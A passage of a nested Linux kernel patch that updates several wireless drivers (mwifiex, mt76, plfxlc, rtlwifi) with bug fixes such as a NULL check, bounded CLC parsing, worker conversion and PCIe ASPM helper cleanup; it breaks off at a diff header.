+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index bcd564dc3554a..c907da2a4789a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -2046,6 +2046,8 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy,
+ 
+ 	mwifiex_set_sys_config_invalid_data(bss_cfg);
+ 
++	memcpy(bss_cfg->mac_addr, priv->curr_addr, ETH_ALEN);
++
+ 	if (params->beacon_interval)
+ 		bss_cfg->beacon_period = params->beacon_interval;
+ 	if (params->dtim_period)
+diff --git a/drivers/net/wireless/marvell/mwifiex/fw.h b/drivers/net/wireless/marvell/mwifiex/fw.h
+index b4f945a549f71..863f5f2247a08 100644
+--- a/drivers/net/wireless/marvell/mwifiex/fw.h
++++ b/drivers/net/wireless/marvell/mwifiex/fw.h
+@@ -165,6 +165,7 @@ enum MWIFIEX_802_11_PRIVACY_FILTER {
+ #define TLV_TYPE_STA_MAC_ADDR       (PROPRIETARY_TLV_BASE_ID + 32)
+ #define TLV_TYPE_BSSID              (PROPRIETARY_TLV_BASE_ID + 35)
+ #define TLV_TYPE_CHANNELBANDLIST    (PROPRIETARY_TLV_BASE_ID + 42)
++#define TLV_TYPE_UAP_MAC_ADDRESS    (PROPRIETARY_TLV_BASE_ID + 43)
+ #define TLV_TYPE_UAP_BEACON_PERIOD  (PROPRIETARY_TLV_BASE_ID + 44)
+ #define TLV_TYPE_UAP_DTIM_PERIOD    (PROPRIETARY_TLV_BASE_ID + 45)
+ #define TLV_TYPE_UAP_BCAST_SSID     (PROPRIETARY_TLV_BASE_ID + 48)
+diff --git a/drivers/net/wireless/marvell/mwifiex/ioctl.h b/drivers/net/wireless/marvell/mwifiex/ioctl.h
+index 091e7ca793762..e8825f302de8a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/ioctl.h
++++ b/drivers/net/wireless/marvell/mwifiex/ioctl.h
+@@ -107,6 +107,7 @@ struct mwifiex_uap_bss_param {
+ 	u8 qos_info;
+ 	u8 power_constraint;
+ 	struct mwifiex_types_wmm_info wmm_info;
++	u8 mac_addr[ETH_ALEN];
+ };
+ 
+ enum {
+diff --git a/drivers/net/wireless/marvell/mwifiex/uap_cmd.c b/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
+index e78a201cd1507..491e366119096 100644
+--- a/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
++++ b/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
+@@ -468,6 +468,7 @@ void mwifiex_config_uap_11d(struct mwifiex_private *priv,
+ static int
+ mwifiex_uap_bss_param_prepare(u8 *tlv, void *cmd_buf, u16 *param_size)
+ {
++	struct host_cmd_tlv_mac_addr *mac_tlv;
+ 	struct host_cmd_tlv_dtim_period *dtim_period;
+ 	struct host_cmd_tlv_beacon_period *beacon_period;
+ 	struct host_cmd_tlv_ssid *ssid;
+@@ -487,6 +488,13 @@ mwifiex_uap_bss_param_prepare(u8 *tlv, void *cmd_buf, u16 *param_size)
+ 	int i;
+ 	u16 cmd_size = *param_size;
+ 
++	mac_tlv = (struct host_cmd_tlv_mac_addr *)tlv;
++	mac_tlv->header.type = cpu_to_le16(TLV_TYPE_UAP_MAC_ADDRESS);
++	mac_tlv->header.len = cpu_to_le16(ETH_ALEN);
++	memcpy(mac_tlv->mac_addr, bss_cfg->mac_addr, ETH_ALEN);
++	cmd_size += sizeof(struct host_cmd_tlv_mac_addr);
++	tlv += sizeof(struct host_cmd_tlv_mac_addr);
++
+ 	if (bss_cfg->ssid.ssid_len) {
+ 		ssid = (struct host_cmd_tlv_ssid *)tlv;
+ 		ssid->header.type = cpu_to_le16(TLV_TYPE_UAP_SSID);
+diff --git a/drivers/net/wireless/mediatek/mt76/eeprom.c b/drivers/net/wireless/mediatek/mt76/eeprom.c
+index 9bc8758573fcc..0a88048b89768 100644
+--- a/drivers/net/wireless/mediatek/mt76/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/eeprom.c
+@@ -62,7 +62,7 @@ int mt76_get_of_eeprom(struct mt76_dev *dev, void *eep, int offset, int len)
+ 		goto out_put_node;
+ 	}
+ 
+-	offset = be32_to_cpup(list);
++	offset += be32_to_cpup(list);
+ 	ret = mtd_read(mtd, offset, len, &retlen, eep);
+ 	put_mtd_device(mtd);
+ 	if (mtd_is_bitflip(ret))
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 9c753c6aabeff..60c9f9c56a4f5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -564,8 +564,7 @@ struct mt76_sdio {
+ 	struct mt76_worker txrx_worker;
+ 	struct mt76_worker status_worker;
+ 	struct mt76_worker net_worker;
+-
+-	struct work_struct stat_work;
++	struct mt76_worker stat_worker;
+ 
+ 	u8 *xmit_buf;
+ 	u32 xmit_buf_sz;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c b/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
+index 304212f5f8da7..d742b22428f0c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
+@@ -205,8 +205,8 @@ static int mt7663s_suspend(struct device *dev)
+ 	mt76_worker_disable(&mdev->mt76.sdio.txrx_worker);
+ 	mt76_worker_disable(&mdev->mt76.sdio.status_worker);
+ 	mt76_worker_disable(&mdev->mt76.sdio.net_worker);
++	mt76_worker_disable(&mdev->mt76.sdio.stat_worker);
+ 
+-	cancel_work_sync(&mdev->mt76.sdio.stat_work);
+ 	clear_bit(MT76_READING_STATS, &mdev->mphy.state);
+ 
+ 	mt76_tx_status_check(&mdev->mt76, true);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 10dda1693d7db..19640ff76bdcf 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -1036,21 +1036,26 @@ int __mt7921_mcu_set_clc(struct mt7921_dev *dev, u8 *alpha2,
+ 		u8 type[2];
+ 		u8 rsvd[64];
+ 	} __packed req = {
++		.ver = 1,
+ 		.idx = idx,
+ 		.env = env_cap,
+ 	};
+ 	int ret, valid_cnt = 0;
+-	u8 i, *pos;
++	u16 buf_len = 0;
++	u8 *pos;
+ 
+ 	if (!clc)
+ 		return 0;
+ 
++	buf_len = le16_to_cpu(clc->len) - sizeof(*clc);
+ 	pos = clc->data;
+-	for (i = 0; i < clc->nr_country; i++) {
++	while (buf_len > 16) {
+ 		struct mt7921_clc_rule *rule = (struct mt7921_clc_rule *)pos;
+ 		u16 len = le16_to_cpu(rule->len);
++		u16 offset = len + sizeof(*rule);
+ 
+-		pos += len + sizeof(*rule);
++		pos += offset;
++		buf_len -= offset;
+ 		if (rule->alpha2[0] != alpha2[0] ||
+ 		    rule->alpha2[1] != alpha2[1])
+ 			continue;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
+index 3b25a06fd9466..8898ba69b8e97 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
+@@ -222,7 +222,7 @@ static int mt7921s_suspend(struct device *__dev)
+ 	mt76_txq_schedule_all(&dev->mphy);
+ 	mt76_worker_disable(&mdev->tx_worker);
+ 	mt76_worker_disable(&mdev->sdio.status_worker);
+-	cancel_work_sync(&mdev->sdio.stat_work);
++	mt76_worker_disable(&mdev->sdio.stat_worker);
+ 	clear_bit(MT76_READING_STATS, &dev->mphy.state);
+ 	mt76_tx_status_check(mdev, true);
+ 
+@@ -254,6 +254,7 @@ restore_txrx_worker:
+ restore_worker:
+ 	mt76_worker_enable(&mdev->tx_worker);
+ 	mt76_worker_enable(&mdev->sdio.status_worker);
++	mt76_worker_enable(&mdev->sdio.stat_worker);
+ 
+ 	if (!pm->ds_enable)
+ 		mt76_connac_mcu_set_deep_sleep(mdev, false);
+@@ -286,6 +287,7 @@ static int mt7921s_resume(struct device *__dev)
+ 	mt76_worker_enable(&mdev->sdio.txrx_worker);
+ 	mt76_worker_enable(&mdev->sdio.status_worker);
+ 	mt76_worker_enable(&mdev->sdio.net_worker);
++	mt76_worker_enable(&mdev->sdio.stat_worker);
+ 
+ 	/* restore previous ds setting */
+ 	if (!pm->ds_enable)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+index 1b3adb3d91e86..fd07b66233920 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+@@ -107,7 +107,7 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_worker_disable(&dev->mt76.sdio.txrx_worker);
+ 	mt76_worker_disable(&dev->mt76.sdio.status_worker);
+ 	mt76_worker_disable(&dev->mt76.sdio.net_worker);
+-	cancel_work_sync(&dev->mt76.sdio.stat_work);
++	mt76_worker_disable(&dev->mt76.sdio.stat_worker);
+ 
+ 	mt7921s_disable_irq(&dev->mt76);
+ 	mt7921s_wfsys_reset(dev);
+@@ -115,6 +115,7 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_worker_enable(&dev->mt76.sdio.txrx_worker);
+ 	mt76_worker_enable(&dev->mt76.sdio.status_worker);
+ 	mt76_worker_enable(&dev->mt76.sdio.net_worker);
++	mt76_worker_enable(&dev->mt76.sdio.stat_worker);
+ 
+ 	dev->fw_assert = false;
+ 	clear_bit(MT76_MCU_RESET, &dev->mphy.state);
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 176207f3177c4..fc4fb94635645 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -481,21 +481,21 @@ static void mt76s_status_worker(struct mt76_worker *w)
+ 		if (dev->drv->tx_status_data && ndata_frames > 0 &&
+ 		    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state) &&
+ 		    !test_bit(MT76_STATE_SUSPEND, &dev->phy.state))
+-			ieee80211_queue_work(dev->hw, &dev->sdio.stat_work);
++			mt76_worker_schedule(&sdio->stat_worker);
+ 	} while (nframes > 0);
+ 
+ 	if (resched)
+ 		mt76_worker_schedule(&dev->tx_worker);
+ }
+ 
+-static void mt76s_tx_status_data(struct work_struct *work)
++static void mt76s_tx_status_data(struct mt76_worker *worker)
+ {
+ 	struct mt76_sdio *sdio;
+ 	struct mt76_dev *dev;
+ 	u8 update = 1;
+ 	u16 count = 0;
+ 
+-	sdio = container_of(work, struct mt76_sdio, stat_work);
++	sdio = container_of(worker, struct mt76_sdio, stat_worker);
+ 	dev = container_of(sdio, struct mt76_dev, sdio);
+ 
+ 	while (true) {
+@@ -508,7 +508,7 @@ static void mt76s_tx_status_data(struct work_struct *work)
+ 	}
+ 
+ 	if (count && test_bit(MT76_STATE_RUNNING, &dev->phy.state))
+-		ieee80211_queue_work(dev->hw, &sdio->stat_work);
++		mt76_worker_schedule(&sdio->status_worker);
+ 	else
+ 		clear_bit(MT76_READING_STATS, &dev->phy.state);
+ }
+@@ -600,8 +600,8 @@ void mt76s_deinit(struct mt76_dev *dev)
+ 	mt76_worker_teardown(&sdio->txrx_worker);
+ 	mt76_worker_teardown(&sdio->status_worker);
+ 	mt76_worker_teardown(&sdio->net_worker);
++	mt76_worker_teardown(&sdio->stat_worker);
+ 
+-	cancel_work_sync(&sdio->stat_work);
+ 	clear_bit(MT76_READING_STATS, &dev->phy.state);
+ 
+ 	mt76_tx_status_check(dev, true);
+@@ -644,10 +644,14 @@ int mt76s_init(struct mt76_dev *dev, struct sdio_func *func,
+ 	if (err)
+ 		return err;
+ 
++	err = mt76_worker_setup(dev->hw, &sdio->stat_worker, mt76s_tx_status_data,
++				"sdio-sta");
++	if (err)
++		return err;
++
+ 	sched_set_fifo_low(sdio->status_worker.task);
+ 	sched_set_fifo_low(sdio->net_worker.task);
+-
+-	INIT_WORK(&sdio->stat_work, mt76s_tx_status_data);
++	sched_set_fifo_low(sdio->stat_worker.task);
+ 
+ 	dev->queue_ops = &sdio_queue_ops;
+ 	dev->bus = bus_ops;
+diff --git a/drivers/net/wireless/purelifi/plfxlc/usb.c b/drivers/net/wireless/purelifi/plfxlc/usb.c
+index 76d0a778636a4..311676c1ece0a 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/usb.c
++++ b/drivers/net/wireless/purelifi/plfxlc/usb.c
+@@ -493,9 +493,12 @@ int plfxlc_usb_wreq_async(struct plfxlc_usb *usb, const u8 *buffer,
+ 			  void *context)
+ {
+ 	struct usb_device *udev = interface_to_usbdev(usb->ez_usb);
+-	struct urb *urb = usb_alloc_urb(0, GFP_ATOMIC);
++	struct urb *urb;
+ 	int r;
+ 
++	urb = usb_alloc_urb(0, GFP_ATOMIC);
++	if (!urb)
++		return -ENOMEM;
+ 	usb_fill_bulk_urb(urb, udev, usb_sndbulkpipe(udev, EP_DATA_OUT),
+ 			  (void *)buffer, buffer_len, complete_fn, context);
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/pci.c b/drivers/net/wireless/realtek/rtlwifi/pci.c
+index ca79f652fef3c..6116c1bec1558 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/pci.c
++++ b/drivers/net/wireless/realtek/rtlwifi/pci.c
+@@ -164,21 +164,29 @@ static bool _rtl_pci_platform_switch_device_pci_aspm(
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
+ 
++	value &= PCI_EXP_LNKCTL_ASPMC;
++
+ 	if (rtlhal->hw_type != HARDWARE_TYPE_RTL8192SE)
+-		value |= 0x40;
++		value |= PCI_EXP_LNKCTL_CCC;
+ 
+-	pci_write_config_byte(rtlpci->pdev, 0x80, value);
++	pcie_capability_clear_and_set_word(rtlpci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPMC | value,
++					   value);
+ 
+ 	return false;
+ }
+ 
+-/*When we set 0x01 to enable clk request. Set 0x0 to disable clk req.*/
+-static void _rtl_pci_switch_clk_req(struct ieee80211_hw *hw, u8 value)
++/* @value is PCI_EXP_LNKCTL_CLKREQ_EN or 0 to enable/disable clk request. */
++static void _rtl_pci_switch_clk_req(struct ieee80211_hw *hw, u16 value)
+ {
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
+ 
+-	pci_write_config_byte(rtlpci->pdev, 0x81, value);
++	value &= PCI_EXP_LNKCTL_CLKREQ_EN;
++
++	pcie_capability_clear_and_set_word(rtlpci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_CLKREQ_EN,
++					   value);
+ 
+ 	if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE)
+ 		udelay(100);
+@@ -192,11 +200,8 @@ static void rtl_pci_disable_aspm(struct ieee80211_hw *hw)
+ 	struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	u8 pcibridge_vendor = pcipriv->ndis_adapter.pcibridge_vendor;
+-	u8 num4bytes = pcipriv->ndis_adapter.num4bytes;
+ 	/*Retrieve original configuration settings. */
+ 	u8 linkctrl_reg = pcipriv->ndis_adapter.linkctrl_reg;
+-	u16 pcibridge_linkctrlreg = pcipriv->ndis_adapter.
+-				pcibridge_linkctrlreg;
+ 	u16 aspmlevel = 0;
+ 	u8 tmp_u1b = 0;
+ 
+@@ -221,16 +226,8 @@ static void rtl_pci_disable_aspm(struct ieee80211_hw *hw)
+ 	/*Set corresponding value. */
+ 	aspmlevel |= BIT(0) | BIT(1);
+ 	linkctrl_reg &= ~aspmlevel;
+-	pcibridge_linkctrlreg &= ~(BIT(0) | BIT(1));
+ 
+ 	_rtl_pci_platform_switch_device_pci_aspm(hw, linkctrl_reg);
+-	udelay(50);
+-
+-	/*4 Disable Pci Bridge ASPM */
+-	pci_write_config_byte(rtlpci->pdev, (num4bytes << 2),
+-			      pcibridge_linkctrlreg);
+-
+-	udelay(50);
+ }
+ 
+ /*Enable RTL8192SE ASPM & Enable Pci Bridge ASPM for
+@@ -245,9 +242,7 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 	struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	u8 pcibridge_vendor = pcipriv->ndis_adapter.pcibridge_vendor;
+-	u8 num4bytes = pcipriv->ndis_adapter.num4bytes;
+ 	u16 aspmlevel;
+-	u8 u_pcibridge_aspmsetting;
+ 	u8 u_device_aspmsetting;
+ 
+ 	if (!ppsc->support_aspm)
+@@ -259,25 +254,6 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 		return;
+ 	}
+ 
+-	/*4 Enable Pci Bridge ASPM */
+-
+-	u_pcibridge_aspmsetting =
+-	    pcipriv->ndis_adapter.pcibridge_linkctrlreg |
+-	    rtlpci->const_hostpci_aspm_setting;
+-
+-	if (pcibridge_vendor == PCI_BRIDGE_VENDOR_INTEL)
+-		u_pcibridge_aspmsetting &= ~BIT(0);
+-
+-	pci_write_config_byte(rtlpci->pdev, (num4bytes << 2),
+-			      u_pcibridge_aspmsetting);
+-
+-	rtl_dbg(rtlpriv, COMP_INIT, DBG_LOUD,
+-		"PlatformEnableASPM(): Write reg[%x] = %x\n",
+-		(pcipriv->ndis_adapter.pcibridge_pciehdr_offset + 0x10),
+-		u_pcibridge_aspmsetting);
+-
+-	udelay(50);
+-
+ 	/*Get ASPM level (with/without Clock Req) */
+ 	aspmlevel = rtlpci->const_devicepci_aspm_setting;
+ 	u_device_aspmsetting = pcipriv->ndis_adapter.linkctrl_reg;
+@@ -291,7 +267,8 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 
+ 	if (ppsc->reg_rfps_level & RT_RF_OFF_LEVL_CLK_REQ) {
+ 		_rtl_pci_switch_clk_req(hw, (ppsc->reg_rfps_level &
+-					     RT_RF_OFF_LEVL_CLK_REQ) ? 1 : 0);
++					     RT_RF_OFF_LEVL_CLK_REQ) ?
++					     PCI_EXP_LNKCTL_CLKREQ_EN : 0);
+ 		RT_SET_PS_LEVEL(ppsc, RT_RF_OFF_LEVL_CLK_REQ);
+ 	}
+ 	udelay(100);
+@@ -358,22 +335,6 @@ static bool rtl_pci_check_buddy_priv(struct ieee80211_hw *hw,
+ 	return tpriv != NULL;
+ }
+ 
+-static void rtl_pci_get_linkcontrol_field(struct ieee80211_hw *hw)
+-{
+-	struct rtl_pci_priv *pcipriv = rtl_pcipriv(hw);
+-	struct rtl_pci *rtlpci = rtl_pcidev(pcipriv);
+-	u8 capabilityoffset = pcipriv->ndis_adapter.pcibridge_pciehdr_offset;
+-	u8 linkctrl_reg;
+-	u8 num4bbytes;
+-
+-	num4bbytes = (capabilityoffset + 0x10) / 4;
+-
+-	/*Read  Link Control Register */
+-	pci_read_config_byte(rtlpci->pdev, (num4bbytes << 2), &linkctrl_reg);
+-
+-	pcipriv->ndis_adapter.pcibridge_linkctrlreg = linkctrl_reg;
+-}
+-
+ static void rtl_pci_parse_configuration(struct pci_dev *pdev,
+ 					struct ieee80211_hw *hw)
+ {
+@@ -2033,12 +1994,6 @@ static bool _rtl_pci_find_adapter(struct pci_dev *pdev,
+ 		    PCI_SLOT(bridge_pdev->devfn);
+ 		pcipriv->ndis_adapter.pcibridge_funcnum =
+ 		    PCI_FUNC(bridge_pdev->devfn);
+-		pcipriv->ndis_adapter.pcibridge_pciehdr_offset =
+-		    pci_pcie_cap(bridge_pdev);
+-		pcipriv->ndis_adapter.num4bytes =
+-		    (pcipriv->ndis_adapter.pcibridge_pciehdr_offset + 0x10) / 4;
+-
+-		rtl_pci_get_linkcontrol_field(hw);
+ 
+ 		if (pcipriv->ndis_adapter.pcibridge_vendor ==
+ 		    PCI_BRIDGE_VENDOR_AMD) {
+@@ -2055,13 +2010,11 @@ static bool _rtl_pci_find_adapter(struct pci_dev *pdev,
+ 		pdev->vendor, pcipriv->ndis_adapter.linkctrl_reg);
+ 
+ 	rtl_dbg(rtlpriv, COMP_INIT, DBG_DMESG,
+-		"pci_bridge busnumber:devnumber:funcnumber:vendor:pcie_cap:link_ctl_reg:amd %d:%d:%d:%x:%x:%x:%x\n",
++		"pci_bridge busnumber:devnumber:funcnumber:vendor:amd %d:%d:%d:%x:%x\n",
+ 		pcipriv->ndis_adapter.pcibridge_busnum,
+ 		pcipriv->ndis_adapter.pcibridge_devnum,
+ 		pcipriv->ndis_adapter.pcibridge_funcnum,
+ 		pcibridge_vendors[pcipriv->ndis_adapter.pcibridge_vendor],
+-		pcipriv->ndis_adapter.pcibridge_pciehdr_offset,
+-		pcipriv->ndis_adapter.pcibridge_linkctrlreg,
+ 		pcipriv->ndis_adapter.amd_l1_patch);
+ 
+ 	rtl_pci_parse_configuration(pdev, hw);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/pci.h b/drivers/net/wireless/realtek/rtlwifi/pci.h
+index 866861626a0a1..d6307197dfea0 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/pci.h
++++ b/drivers/net/wireless/realtek/rtlwifi/pci.h
+@@ -236,11 +236,6 @@ struct mp_adapter {
+ 	u16 pcibridge_vendorid;
+ 	u16 pcibridge_deviceid;
+ 
+-	u8 num4bytes;
+-
+-	u8 pcibridge_pciehdr_offset;
+-	u8 pcibridge_linkctrlreg;
+-
+ 	bool amd_l1_patch;
+ };
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
+index 12d0b3a87af7c..0fab3a0c7d49d 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
+@@ -16,12 +16,6 @@ static u32 _rtl88e_phy_rf_serial_read(struct ieee80211_hw *hw,
+ static void _rtl88e_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					enum radio_path rfpath, u32 offset,
+ 					u32 data);
+-static u32 _rtl88e_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+ static bool _rtl88e_phy_bb8188e_config_parafile(struct ieee80211_hw *hw);
+ static bool _rtl88e_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);
+ static bool phy_config_bb_with_headerfile(struct ieee80211_hw *hw,
+@@ -51,7 +45,7 @@ u32 rtl88e_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), bitmask(%#x)\n", regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -74,7 +68,7 @@ void rtl88e_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -99,7 +93,7 @@ u32 rtl88e_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 
+ 
+ 	original_value = _rtl88e_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -127,7 +121,7 @@ void rtl88e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl88e_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
+index 3d29c8dbb2559..144ee780e1b6a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
+@@ -17,7 +17,7 @@ u32 rtl92c_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE, "regaddr(%#x), bitmask(%#x)\n",
+ 		regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -40,7 +40,7 @@ void rtl92c_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -143,14 +143,6 @@ void _rtl92c_phy_rf_serial_write(struct ieee80211_hw *hw,
+ }
+ EXPORT_SYMBOL(_rtl92c_phy_rf_serial_write);
+ 
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-EXPORT_SYMBOL(_rtl92c_phy_calculate_bit_shift);
+-
+ static void _rtl92c_phy_bb_config_1t(struct ieee80211_hw *hw)
+ {
+ 	rtl_set_bbreg(hw, RFPGA0_TXINFO, 0x3, 0x2);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
+index 75afa6253ad02..e64d377dfe9e2 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
+@@ -196,7 +196,6 @@ bool rtl92c_phy_set_rf_power_state(struct ieee80211_hw *hw,
+ void rtl92ce_phy_set_rf_on(struct ieee80211_hw *hw);
+ void rtl92c_phy_set_io(struct ieee80211_hw *hw);
+ void rtl92c_bb_block_on(struct ieee80211_hw *hw);
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask);
+ long _rtl92c_phy_txpwr_idx_to_dbm(struct ieee80211_hw *hw,
+ 				  enum wireless_mode wirelessmode,
+ 				  u8 txpwridx);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
+index da54e51badd3a..fa70a7d5539fd 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
+@@ -39,7 +39,7 @@ u32 rtl92c_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 							       rfpath, regaddr);
+ 	}
+ 
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -110,7 +110,7 @@ void rtl92ce_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -122,7 +122,7 @@ void rtl92ce_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 								       rfpath,
+ 								       regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
+index 7582a162bd112..c7a0d4c776f0a 100644
